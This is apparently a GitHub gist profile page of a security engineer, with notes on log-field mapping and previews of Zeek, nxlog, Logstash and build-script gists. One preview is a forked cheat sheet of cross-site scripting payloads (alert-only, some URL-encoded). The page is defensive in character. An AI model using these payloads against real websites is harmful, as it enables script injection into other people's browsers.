Nate Guagenti neu5ron
onboarding data sets, events, and logs

  1. try to map as many fields from that log to the existing CDM entities
  2. if a field does not map to an existing CDM, see if other log sources have similar values that could make it possible to create a new CDM entity. additionally, if a limit of the backend database or source means the field cannot be renamed, then skip this.
  3. if there is not enough for number 2, or it is possible that no other log source would ever have those values, THEN a sub CDM (aka a CDM specific to that log source) should be created and documented for that log source. if that log source has values specific to itself, but those values are across multiple data/logs, then a sub entity (sub CDM) should be created. aka a custom entity for that log.

notes #TODO:organize

what is the purpose of OSSEM? are we still aligning to this? https://github.com/hunters-forge/OSSEM#goals

@neu5ron
neu5ron / quickly_get_zeek_into_elastic.md
Last active March 11, 2021 01:31
quick hack to get into any Elastic
neu5ron / xss_vectors.txt
Created July 3, 2018 05:55 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
neu5ron / additional_http_headers-main.bro
Last active January 9, 2019 11:18
Add Additional HTTP Header fields to Bro http logs
module HTTP;
# Add additional HTTP Headers to the http.log record
redef record Info += {
# Origin "Origin" request header
origin: string &log &optional;
};
event http_header(c: connection, is_orig: bool, name: string, value: string) &priority=5
{
# Only client (originator) request headers carry Origin; guard against a missing http record
if ( is_orig && c?$http && name == "ORIGIN" )
c$http$origin = value;
}
#define ROOT C:\Program Files\nxlog
define ROOT C:\Program Files (x86)\nxlog
Moduledir %ROOT%\modules
CacheDir %ROOT%\data
Pidfile %ROOT%\data\nxlog.pid
SpoolDir %ROOT%\data
LogFile %ROOT%\data\nxlog.log
<Extension _json>
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[EventData[Data[@Name='ObjectName'] and (Data='C:\Users\Public\Documents\new-login-information.txt')]]
and
*[System[(EventID='4663')]]
</Select>
</Query>
</QueryList>
neu5ron / 511-windows-event-powershell-operational.conf
Last active August 13, 2018 18:50
Windows PowerShell Logstash Parser. Parses EventIDs 4103 and 4104. Hashes Script Block Text ---- useful for finding recurring scripts we want to whitelist/blacklist. Hashes Script Block Text and UserID ---- because sometimes certain accounts should not run certain scripts, so filtering just by hash could be a problem.
filter {
if [@meta][log][type] == "windows-wef" {
# PowerShell Operational Only
if [Channel] == "Microsoft-Windows-PowerShell/Operational" {
# EventID 4103
if [EventID] == 4103 {
sudo apt-get -y install build-essential checkinstall automake libtool pkg-config;
wget -O libsodium.tar.gz https://download.libsodium.org/libsodium/releases/LATEST.tar.gz
mkdir libsodium && tar -zxvf libsodium.tar.gz -C libsodium --strip-components=1;
cd libsodium;
chmod +x configure && sh ./configure;
make;
sudo make install;
sudo ldconfig;
cd ../;
wget -O dnscrypt.tar.gz https://download.dnscrypt.org/dnscrypt-proxy/LATEST.tar.gz;